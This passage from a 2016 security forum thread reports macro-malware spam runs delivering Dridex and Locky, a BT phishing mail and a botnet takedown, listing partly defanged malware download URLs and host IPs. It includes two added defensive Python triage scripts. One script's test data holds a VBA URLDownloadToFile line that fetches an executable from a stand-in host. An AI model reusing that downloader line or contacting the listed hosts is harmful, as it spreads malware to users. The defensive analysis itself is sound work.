 http ://jabez .jp/1278u0 (VirusTotal 12/57**)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1459948652/

** https://www.virustot...sis/1459961706/
TCP connections
109.235.139.64

jabez .jp: 120.136.14.15: https://www.virustot...15/information/
___

Fake 'Remittance Details' SPAM - rtf macro malware delivers Dridex
- https://myonlinesecu...elivers-dridex/
6 Apr 2016 - "An email with the subject of 'Remittance Details (USD 7956.88) – your-web-address' pretending to come from random senders with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... One of the emails looks like:
From: random senders
Date: Wed 06/04/2016 16:04
Subject: Remittance Details (USD 7956.88) – securityandprivacy.co.uk
Attachment: Invoice Number 0297376 – Issue Date 02165639.rtf
    Dear All
    Please find attached your banking details and do note the difference from the one we have We are to proceed with the payment of USD 7956.88 so please do verify attached bank details to avoid making payment to the wrong person as it is our custom. Please reply if you have any questions. Thanks Beryl Frye NAMIBIAN RESOURCES...


6 April 2016: Invoice Number 0297376 – Issue Date 02165639.rtf - Current Virus total detections 4/56*
.. MALWR** shows a download of Dridex banking Trojan from
 http ://shop.bleutree .biz/tablets/galaxytab3.php which gave me crypted122med.exe (VirusTotal 5/56***)...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1459960107/

** https://malwr.com/an...jYzMWRmNDg5NmY/
Hosts
85.143.209.13: https://www.virustot...13/information/
>> https://www.virustot...a9d13/analysis/

*** https://www.virustot...sis/1459960596/

shop.bleutree .biz: 85.143.209.13
___

Fake 'Security Update' SPAM - BT phish
- https://myonlinesecu...te-bt-phishing/
6 Apr 2016 - "'Attention! Security Update' pretending to come from BT is one of the latest -phish- attempts to steal your BT details and your Bank, credit card and personal details... This one wants your personal details, BT log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well...

Screenshot: https://myonlinesecu...il-1024x781.png

... When (IF) you fill in your user name and password you are sent to a page where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
 



Edited by AplusWebMaster, 06 April 2016 - 02:11 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1693 AplusWebMaster
Posted 07 April 2016 - 06:02 AM

FYI...

Fake 'invoice' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
7 Apr 2016 - "A -series- of emails with the basic subject of 'invoice' pretending to come from random names with a malicious word doc attachment is another one from the current bot runs... Some of the subjects seen include:
    Uta Mclaughlin: Latest Invoice
    Meghan Mckay, Sales Invoice
    Fwd:Camille Glover. Purchase Invoice

The email looks like:
From: Uta Mclaughlin <nickbockholdt@ gmx .de> / Meghan Mckay <ramykhalifa@ emerge-studio .com> /
Camille Glover <david@ deliciousworldcorp .com>
Date: Thu 07/04/2016 04:51
Subject:  Uta Mclaughlin: Latest Invoice
Attachment: 4872113603.doc
    Please review the document enclosed with this message.
    Kind regards
    Meghan Mckay


7 April 2016: 4872113603.doc - Current VirusTotal detections 3/57*
.. Payload Security** shows a download from creditprimo .com/h1.jpg?BbZJpyfbopM=12
  which gives this image (VirusTotal 2/57***). The macro extracts the malware from the image to give
  12120.exe (VirusTotal 2/57[4]). MALWR[5]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1460006738/

** https://www.hybrid-a...environmentId=4
Contacted Hosts
138.128.125.153

*** https://www.virustot...sis/1460008049/

4] https://www.virustot...sis/1460007688/

5] https://malwr.com/an...ThjNWFhMDk3Mzc/
___

Fake 'Your Latest Documents' SPAM - doc macro malware leads to Locky Ransomware
- https://myonlinesecu...cky-ransomware/
7 Apr 2016 - "An email with the subject of 'Your Latest Documents' from Angel Springs Ltd [STA054C] pretending to come from ebilling@ angelsprings .com with a malicious word doc attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...4C-848x1024.png

7 April 2016: G-A0288010040780590521.pdf / G-A0288010040780590521.docm - Current VirusTotal detections 9/56*
.. MALWR** shows a download from http ://360webhosts .com/0uh634 (VirusTotal 13/56***) which is the -same- malware as described HERE[4] which is actually a downloader that downloads from 185.103.252.148/files/o35jkR.exe which is Locky Ransomware (VirusTotal 2/56[5])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1460028627/

** https://malwr.com/an...GIzNGQ0NzYyZGQ/
Hosts
202.87.31.185: https://www.virustot...85/information/
>> https://www.virustot...7c663/analysis/
109.235.139.64

*** https://www.virustot...sis/1460027909/
TCP connections
109.235.139.64

4] https://myonlinesecu...-macro-malware/

5] https://www.virustot...sis/1460026504/

185.103.252.148: https://www.virustot...48/information/
>> https://www.virustot...d971a/analysis/
 



Edited by AplusWebMaster, 07 April 2016 - 06:48 AM.

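The 'invoice' run above fetches an "h1.jpg" and the macro then pulls 12120.exe out of it, so anything that trusts the URL extension or the leading JPEG bytes sees an image. The script below is an added example (not code from the post, from myonlinesecurity or from the malware itself) of the check an analyst would run on such a download: note what the file claims to be from its magic bytes, then look for a DOS/PE header anywhere inside it and carve it out. The sample is constructed here in memory (a JPEG prefix wrapped around a minimal PE header); no real payload is involved.

```python
"""Carve a PE executable hidden behind an image header (added example)."""
import struct
from typing import Dict, List, Optional

IMAGE_MAGICS = {
    b"\xff\xd8\xff": "JPEG",
    b"\x89PNG\r\n\x1a\n": "PNG",
    b"GIF87a": "GIF",
    b"GIF89a": "GIF",
}
MACHINE_NAMES = {0x14C: "x86", 0x8664: "x64"}


def sniff_image(blob: bytes) -> Optional[str]:
    """Return the image type the leading magic bytes claim, or None."""
    for magic, name in IMAGE_MAGICS.items():
        if blob.startswith(magic):
            return name
    return None


def find_pe_offsets(blob: bytes) -> List[int]:
    """Offsets of every 'MZ' whose e_lfanew (DOS header + 0x3C) points at 'PE\\0\\0'.

    Validating e_lfanew rejects the random 'MZ' byte pairs that occur in
    compressed image data, so a bare string search would not be enough.
    """
    hits = []
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if 0x40 <= e_lfanew <= 0x1000 and blob[pe:pe + 4] == b"PE\x00\x00":
                hits.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return hits


def carve_pe(blob: bytes) -> Optional[bytes]:
    """Return everything from the first embedded PE header to end of file, or None."""
    offs = find_pe_offsets(blob)
    return blob[offs[0]:] if offs else None


def triage_download(blob: bytes) -> Dict:
    """Summarise the mismatch between what the file claims and what it carries."""
    offs = find_pe_offsets(blob)
    report = {
        "claimed_type": sniff_image(blob),
        "embedded_pe": bool(offs),
        "pe_offset": offs[0] if offs else None,
        "machine": None,
    }
    if offs:
        e_lfanew = struct.unpack_from("<I", blob, offs[0] + 0x3C)[0]
        # COFF Machine field sits right after the 4-byte 'PE\0\0' signature
        machine = struct.unpack_from("<H", blob, offs[0] + e_lfanew + 4)[0]
        report["machine"] = MACHINE_NAMES.get(machine, hex(machine))
    return report


def build_fake_pe(machine: int = 0x14C) -> bytes:
    """Constructed stand-in for a dropped executable: DOS header + PE signature + COFF header."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header directly after the DOS header
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0, 0x0102)
    return bytes(dos) + b"PE\x00\x00" + coff + b"\x00" * 64


# Constructed sample: JPEG SOI + APP0/JFIF segment, a PE in the middle, JPEG EOI at the end.
JPEG_PREFIX = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
               + b"\x00" * 200)
SAMPLE = JPEG_PREFIX + build_fake_pe() + b"\xff\xd9"

if __name__ == "__main__":
    print(triage_download(SAMPLE))
    carved = carve_pe(SAMPLE)
    print("carved", len(carved) if carved else 0, "bytes")
```

On a proxy or mail gateway the same idea applies in reverse: do not let `Content-Type: image/jpeg` or a `.jpg` extension short-circuit content inspection, because the second stage in these runs is exactly the byte stream this scan catches.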


#1694 AplusWebMaster
Posted 09 April 2016 - 11:21 AM

FYI...

Researchers shut down SPAM botnet - 4,000 Linux machines
- http://arstechnica.c...linux-machines/
Apr 9, 2016 - "A botnet that enslaved about 4,000-Linux-computers and caused them to blast the Internet with spam for more-than-a-year has finally been shut down. Known as -Mumblehard- the botnet was the product of highly skilled developers. It used a custom "packer" to conceal the Perl-based source code that made it run, a backdoor that gave attackers persistent access, and a mail daemon that was able to send large volumes of spam. Command servers that coordinated the compromised machines' operations could also send messages to Spamhaus requesting the -delisting- of -any- Mumblehard-based IP addresses... In the months following Eset's* discovery of Mumblehard in late 2014, company researchers worked with Estonian law enforcement and an industry partner to shut down the botnet. In February of this year, the group took control of the Internet address belonging to the command server, making it possible for researchers to "sinkhole" the botnet. Rather than connecting to the attackers' control server, the infected machines connected to benign machines operated by the takedown participants. By analyzing the incoming traffic, they estimated that about 4,000 computers were infected. Researchers still don't know how Mumblehard was able to initially take hold of its victims... The number of machines reporting to the sinkholed server has been slowly dropping as compromised systems are disinfected."
* http://www.welivesec...-from-spamming/

> http://www.welivesec...ole_stats_1.png
Stats from Mumblehard sinkhole

> http://www.welivesec...ole_stats_2.png
Statistics from our new sinkhole
 



Edited by AplusWebMaster, 09 April 2016 - 02:39 PM.



#1695 AplusWebMaster
Posted 11 April 2016 - 06:20 AM

FYI...

Ransomware: Past, Present, and Future
- https://blogs.cisco....sent-and-future
Apr 11, 2016 - "... The problem we face is that every single business that -pays- to recover their files, is directly funding the development of the next generation of ransomware. As a result of this we’re seeing ransomware evolve at an alarming rate... Ransomware as we know it today has a sort of ‘spray and pray’ mentality; they hit as many individual targets as they can as quickly as possible. Typically, payloads are delivered via exploit kits or mass phishing campaigns. Recently a number of scattered ransomware campaigns deliberately targeting enterprise networks, have come to light. We believe that this is a harbinger of what’s to come — a portent for the future of ransomware. Traditionally, malware was never terribly concerned with the destruction of data or denial of access to its contents; with few notable exceptions, data loss was mostly a side-effect of malware campaigns. Most actors were concerned with sustained access to data or the resources a system provided to meet their objectives. Ransomware is a change to this paradigm from subversion of systems to outright extortion; actors are now denying access to data, and demanding money to restore access to that data..."
> http://blog.talosint...mware.html#more
___

Fake 'DTC Workshop' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
11 Apr 2016 - "An email with the subject of 'Emailing: M_20150401_0729_AY56EMF __XLRAE55CF0L324298' pretending to come from DTC Workshop <workshop@ digitaltachocentre .co.uk> with a malicious word doc attachment is another one from the current bot runs... The email looks like:
From: DTC Workshop <workshop@ digitaltachocentre .co.uk>
Date: Mon 11/04/2016 10:16
Subject: Emailing: M_20150401_0729_AY56EMF      __XLRAE55CF0L324298
Attachment: M_20150401_0729_AY56EMF      __XLRAE55CF0L324298.DOCM
    Your message is ready to be sent with the following file or link
    attachments:
    M_20150401_0729_AY56EMF     __XLRAE55CF0L324298
    Note: To protect against computer viruses, e-mail programs may prevent
    sending or receiving certain types of file attachments. Check your e-mail
    security settings to determine how attachments are handled.


11 April 2016: M_20150401_0729_AY56EMF      __XLRAE55CF0L324298.DOCM - Current VirusTotal detections 8/57*
.. MALWR** and Payload Security*** show a download from http ://oootels .ru/87t5gh (VirusTotal 5/56[4])
 which looks like Dridex banking Trojan but might be a rockloader Locky ransomware downloader
.. MALWR[5] analysis is inconclusive... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1460366222/

** https://malwr.com/an...WFhYTQxZjJmOWU/
Hosts
90.156.201.101

*** https://www.hybrid-a...environmentId=4
Contacted Hosts
90.156.201.59
194.116.73.71


4] https://www.virustot...sis/1460365587/

5] https://malwr.com/an...GFmYzVmOGEyZTU/

oootels .ru: 90.156.201.25
90.156.201.101
90.156.201.59: https://www.virustot...59/information/
>> https://www.virustot...b3667/analysis/
90.156.201.67: https://www.virustot...67/information/
>> https://www.virustot...e26f7/analysis/
 



Edited by AplusWebMaster, 11 April 2016 - 09:33 AM.

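Every mail run quoted in these posts (the .rtf 'Remittance Details', the .doc 'invoice', the .pdf/.docm 'Your Latest Documents' and the .DOCM 'DTC Workshop') turns on the same two things: an Office attachment carrying a VBA project or an embedded object, and a second-stage URL the macro fetches once someone clicks 'Enable Content'. The script below is an added example (not code from the posts, from myonlinesecurity or from any of the samples) of a static triage that flags those indicators before anyone opens the file: a vbaProject.bin inside an OOXML container, an RTF `\objdata` payload whose hex decodes to an OLE compound file, a filename extension that does not match the real container (the '.pdf' that is really a .docm), and any http(s) URL found in the macro storage, printed defanged the way the posts print them. All three attachments it runs on are constructed in memory; the URL `example.invalid` and the OLE1 wrapper layout are placeholders, not the real samples.

```python
"""Static triage of Office/RTF mail attachments for macro indicators (added example)."""
import hashlib
import io
import re
import struct
import zipfile
from typing import Dict, List, Tuple

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?:/[A-Za-z0-9._~\-/?%&=]*)?")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
# Which container(s) a given extension should legitimately map to.
EXPECTED_CONTAINER = {
    "rtf": {"rtf"}, "docx": {"ooxml"}, "docm": {"ooxml"}, "xlsx": {"ooxml"},
    "xlsm": {"ooxml"}, "doc": {"ole2", "rtf", "ooxml"}, "xls": {"ole2", "ooxml"},
    "pdf": {"pdf"},
}


def defang(url: str) -> str:
    """hxxp://host[.]tld/path, so the IOC cannot be clicked by accident."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def sniff_container(blob: bytes) -> str:
    if blob.startswith(b"PK\x03\x04"):
        return "ooxml"
    if blob.startswith(b"{\\rtf"):
        return "rtf"
    if blob.startswith(OLE_MAGIC):
        return "ole2"
    if blob.startswith(b"%PDF"):
        return "pdf"
    return "unknown"


def ooxml_macro_indicators(blob: bytes) -> Tuple[bool, List[str]]:
    """Is there a VBA project in the zip, and which URLs appear in it as plain strings?"""
    has_vba, urls = False, []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for name in zf.namelist():
            if name.lower().endswith("vbaproject.bin"):
                has_vba = True
                urls += [m.decode("ascii", "replace") for m in URL_RE.findall(zf.read(name))]
    return has_vba, urls


def rtf_embedded_objects(blob: bytes) -> List[str]:
    """Decode each \\objdata hex blob and identify what is wrapped inside it."""
    kinds = []
    for hexdata in OBJDATA_RE.findall(blob):
        cleaned = re.sub(rb"\s+", b"", hexdata)
        cleaned = cleaned[: len(cleaned) - (len(cleaned) % 2)]  # drop a dangling nibble
        try:
            payload = bytes.fromhex(cleaned.decode("ascii"))
        except ValueError:
            continue
        if OLE_MAGIC in payload:          # OLE1 header precedes the OLE2 file, so search, not startswith
            kinds.append("OLE compound file")
        elif b"PK\x03\x04" in payload:
            kinds.append("zip/OOXML")
        else:
            kinds.append("unidentified binary")
    return kinds


def triage_attachment(filename: str, blob: bytes) -> Dict:
    container = sniff_container(blob)
    ext = filename.lower().rsplit(".", 1)[-1]
    report = {
        "filename": filename,
        "sha256": hashlib.sha256(blob).hexdigest(),
        "container": container,
        "has_vba_project": False,
        "urls": [],
        "embedded_objects": [],
        "extension_mismatch": ext in EXPECTED_CONTAINER and container not in EXPECTED_CONTAINER[ext],
    }
    if container == "ooxml":
        report["has_vba_project"], urls = ooxml_macro_indicators(blob)
        report["urls"] = [defang(u) for u in urls]
    elif container == "rtf":
        report["embedded_objects"] = rtf_embedded_objects(blob)
    flags = []
    if report["has_vba_project"]:
        flags.append("VBA project present")
    if report["embedded_objects"]:
        flags.append("embedded object in RTF")
    if report["extension_mismatch"]:
        flags.append("extension does not match content")
    report["verdict"] = "suspicious: " + "; ".join(flags) if flags else "no macro indicators"
    return report


def _zip(entries: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples (placeholders, not the real attachments from the posts).
_MACRO_STORAGE = (OLE_MAGIC + b"\x00" * 24 + b'Attribute VB_Name = "ThisDocument"\r\n'
                  + b'URLDownloadToFile 0, "http://example.invalid/87t5gh", "%TEMP%\\a.exe", 0, 0\r\n')
SAMPLE_DOCM = _zip({
    "[Content_Types].xml": b'<Types><Override PartName="/word/document.xml" '
                           b'ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/></Types>',
    "word/document.xml": b"<w:document/>",
    "word/vbaProject.bin": _MACRO_STORAGE,
})
SAMPLE_DOCX = _zip({"[Content_Types].xml": b"<Types/>", "word/document.xml": b"<w:document/>"})
# Simplified OLE1 wrapper: OLEVersion, FormatID=2 (embedded), class name "Package", empty topic/item, NativeDataSize, data.
_OLE1 = (struct.pack("<III", 0x501, 2, 8) + b"Package\x00" + struct.pack("<II", 0, 0)
         + struct.pack("<I", 32) + OLE_MAGIC + b"\x00" * 24)
SAMPLE_RTF = b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata " + _OLE1.hex().encode() + b"}}}"

if __name__ == "__main__":
    for name, blob in [("4872113603.docm", SAMPLE_DOCM), ("Invoice.rtf", SAMPLE_RTF),
                       ("G-A0288010040780590521.pdf", SAMPLE_DOCM), ("clean.docx", SAMPLE_DOCX)]:
        print(triage_attachment(name, blob))
```

One caveat for real files: a genuine vbaProject.bin keeps the VBA source compressed (MS-OVBA), so the plain-string URL scan above only sees URLs that happen to survive uncompressed; for production triage run oletools' `olevba` to decompress the streams first, and treat the presence of vbaProject.bin alone as reason enough to hold the message.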
